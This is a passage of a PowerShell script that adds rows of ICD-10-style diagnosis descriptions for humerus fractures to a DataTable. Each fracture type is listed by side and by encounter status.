$DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of left humerus","Displaced fracture of greater tuberosity of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of left humerus","Displaced fracture of greater tuberosity of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of unspecified humerus","Displaced fracture of greater tuberosity of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of unspecified humerus","Displaced fracture of greater tuberosity of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of unspecified humerus","Displaced fracture of greater tuberosity of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of unspecified humerus","Displaced fracture of greater tuberosity of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of unspecified humerus","Displaced fracture of greater tuberosity of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of unspecified humerus","Displaced fracture of greater tuberosity of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of unspecified humerus","Displaced fracture of greater tuberosity of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of right humerus","Nondisplaced fracture of greater tuberosity of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of right humerus","Nondisplaced fracture of greater tuberosity of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of right humerus","Nondisplaced fracture of greater tuberosity of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of right humerus","Nondisplaced fracture of greater tuberosity of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of right humerus","Nondisplaced fracture of greater tuberosity of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of right humerus","Nondisplaced fracture of greater tuberosity of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of right humerus","Nondisplaced fracture of greater tuberosity of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of left humerus","Nondisplaced fracture of greater tuberosity of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of left humerus","Nondisplaced fracture of greater tuberosity of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of left humerus","Nondisplaced fracture of greater tuberosity of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of left humerus","Nondisplaced fracture of greater tuberosity of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of left humerus","Nondisplaced fracture of greater tuberosity of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of left humerus","Nondisplaced fracture of greater tuberosity of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of left humerus","Nondisplaced fracture of greater tuberosity of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of unspecified humerus","Nondisplaced fracture of greater tuberosity of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of unspecified humerus","Nondisplaced fracture of greater tuberosity of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of unspecified humerus","Nondisplaced fracture of greater tuberosity of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of unspecified humerus","Nondisplaced fracture of greater tuberosity of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of unspecified humerus","Nondisplaced fracture of greater tuberosity of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of unspecified humerus","Nondisplaced fracture of greater tuberosity of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater tuberosity of unspecified humerus","Nondisplaced fracture of greater tuberosity of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of right humerus","Displaced fracture of lesser tuberosity of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of right humerus","Displaced fracture of lesser tuberosity of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of right humerus","Displaced fracture of lesser tuberosity of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of right humerus","Displaced fracture of lesser tuberosity of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of right humerus","Displaced fracture of lesser tuberosity of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of right humerus","Displaced fracture of lesser tuberosity of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of right humerus","Displaced fracture of lesser tuberosity of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of left humerus","Displaced fracture of lesser tuberosity of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of left humerus","Displaced fracture of lesser tuberosity of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of left humerus","Displaced fracture of lesser tuberosity of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of left humerus","Displaced fracture of lesser tuberosity of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of left humerus","Displaced fracture of lesser tuberosity of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of left humerus","Displaced fracture of lesser tuberosity of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of left humerus","Displaced fracture of lesser tuberosity of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of unspecified humerus","Displaced fracture of lesser tuberosity of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of unspecified humerus","Displaced fracture of lesser tuberosity of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of unspecified humerus","Displaced fracture of lesser tuberosity of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of unspecified humerus","Displaced fracture of lesser tuberosity of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of unspecified humerus","Displaced fracture of lesser tuberosity of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of unspecified humerus","Displaced fracture of lesser tuberosity of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser tuberosity of unspecified humerus","Displaced fracture of lesser tuberosity of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of right humerus","Nondisplaced fracture of lesser tuberosity of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of right humerus","Nondisplaced fracture of lesser tuberosity of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of right humerus","Nondisplaced fracture of lesser tuberosity of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of right humerus","Nondisplaced fracture of lesser tuberosity of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of right humerus","Nondisplaced fracture of lesser tuberosity of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of right humerus","Nondisplaced fracture of lesser tuberosity of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of right humerus","Nondisplaced fracture of lesser tuberosity of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of left humerus","Nondisplaced fracture of lesser tuberosity of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of left humerus","Nondisplaced fracture of lesser tuberosity of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of left humerus","Nondisplaced fracture of lesser tuberosity of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of left humerus","Nondisplaced fracture of lesser tuberosity of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of left humerus","Nondisplaced fracture of lesser tuberosity of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of left humerus","Nondisplaced fracture of lesser tuberosity of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of left humerus","Nondisplaced fracture of lesser tuberosity of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of unspecified humerus","Nondisplaced fracture of lesser tuberosity of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of unspecified humerus","Nondisplaced fracture of lesser tuberosity of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of unspecified humerus","Nondisplaced fracture of lesser tuberosity of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of unspecified humerus","Nondisplaced fracture of lesser tuberosity of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of unspecified humerus","Nondisplaced fracture of lesser tuberosity of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of unspecified humerus","Nondisplaced fracture of lesser tuberosity of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser tuberosity of unspecified humerus","Nondisplaced fracture of lesser tuberosity of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right humerus","Torus fracture of upper end of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right humerus","Torus fracture of upper end of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right humerus","Torus fracture of upper end of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right humerus","Torus fracture of upper end of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right humerus","Torus fracture of upper end of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right humerus","Torus fracture of upper end of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left humerus","Torus fracture of upper end of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left humerus","Torus fracture of upper end of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left humerus","Torus fracture of upper end of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left humerus","Torus fracture of upper end of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left humerus","Torus fracture of upper end of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left humerus","Torus fracture of upper end of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified humerus","Torus fracture of upper end of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified humerus","Torus fracture of upper end of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified humerus","Torus fracture of upper end of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified humerus","Torus fracture of upper end of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified humerus","Torus fracture of upper end of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified humerus","Torus fracture of upper end of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of right humerus","Other displaced fracture of upper end of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of right humerus","Other displaced fracture of upper end of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of right humerus","Other displaced fracture of upper end of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of right humerus","Other displaced fracture of upper end of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of right humerus","Other displaced fracture of upper end of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of right humerus","Other displaced fracture of upper end of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of right humerus","Other displaced fracture of upper end of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of left humerus","Other displaced fracture of upper end of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of left humerus","Other displaced fracture of upper end of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of left humerus","Other displaced fracture of upper end of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of left humerus","Other displaced fracture of upper end of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of left humerus","Other displaced fracture of upper end of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of left humerus","Other displaced fracture of upper end of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of left humerus","Other displaced fracture of upper end of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of unspecified humerus","Other displaced fracture of upper end of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of unspecified humerus","Other displaced fracture of upper end of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of unspecified humerus","Other displaced fracture of upper end of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of unspecified humerus","Other displaced fracture of upper end of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of unspecified humerus","Other displaced fracture of upper end of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of unspecified humerus","Other displaced fracture of upper end of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of upper end of unspecified humerus","Other displaced fracture of upper end of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of right humerus","Other nondisplaced fracture of upper end of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of right humerus","Other nondisplaced fracture of upper end of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of right humerus","Other nondisplaced fracture of upper end of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of right humerus","Other nondisplaced fracture of upper end of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of right humerus","Other nondisplaced fracture of upper end of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of right humerus","Other nondisplaced fracture of upper end of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of right humerus","Other nondisplaced fracture of upper end of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of left humerus","Other nondisplaced fracture of upper end of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of left humerus","Other nondisplaced fracture of upper end of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of left humerus","Other nondisplaced fracture of upper end of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of left humerus","Other nondisplaced fracture of upper end of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of left humerus","Other nondisplaced fracture of upper end of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of left humerus","Other nondisplaced fracture of upper end of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of left humerus","Other nondisplaced fracture of upper end of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of unspecified humerus","Other nondisplaced fracture of upper end of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of unspecified humerus","Other nondisplaced fracture of upper end of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of unspecified humerus","Other nondisplaced fracture of upper end of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of unspecified humerus","Other nondisplaced fracture of upper end of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of unspecified humerus","Other nondisplaced fracture of upper end of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of unspecified humerus","Other nondisplaced fracture of upper end of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of upper end of unspecified humerus","Other nondisplaced fracture of upper end of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, right arm","Unspecified fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, right arm","Unspecified fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, right arm","Unspecified fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, right arm","Unspecified fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, right arm","Unspecified fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, right arm","Unspecified fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, right arm","Unspecified fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, left arm","Unspecified fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, left arm","Unspecified fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, left arm","Unspecified fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, left arm","Unspecified fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, left arm","Unspecified fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, left arm","Unspecified fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, left arm","Unspecified fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, unspecified arm","Unspecified fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, unspecified arm","Unspecified fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, unspecified arm","Unspecified fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, unspecified arm","Unspecified fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, unspecified arm","Unspecified fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, unspecified arm","Unspecified fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of humerus, unspecified arm","Unspecified fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, right arm","Greenstick fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, right arm","Greenstick fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, right arm","Greenstick fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, right arm","Greenstick fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, right arm","Greenstick fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, right arm","Greenstick fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, left arm","Greenstick fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, left arm","Greenstick fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, left arm","Greenstick fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, left arm","Greenstick fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, left arm","Greenstick fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, left arm","Greenstick fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, unspecified arm","Greenstick fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, unspecified arm","Greenstick fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, unspecified arm","Greenstick fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, unspecified arm","Greenstick fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, unspecified arm","Greenstick fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of humerus, unspecified arm","Greenstick fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, right arm","Displaced transverse fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, right arm","Displaced transverse fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, right arm","Displaced transverse fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, right arm","Displaced transverse fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, right arm","Displaced transverse fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, right arm","Displaced transverse fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, right arm","Displaced transverse fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, left arm","Displaced transverse fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, left arm","Displaced transverse fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, left arm","Displaced transverse fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, left arm","Displaced transverse fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, left arm","Displaced transverse fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, left arm","Displaced transverse fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, left arm","Displaced transverse fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, unspecified arm","Displaced transverse fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, unspecified arm","Displaced transverse fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, unspecified arm","Displaced transverse fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, unspecified arm","Displaced transverse fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, unspecified arm","Displaced transverse fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, unspecified arm","Displaced transverse fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of humerus, 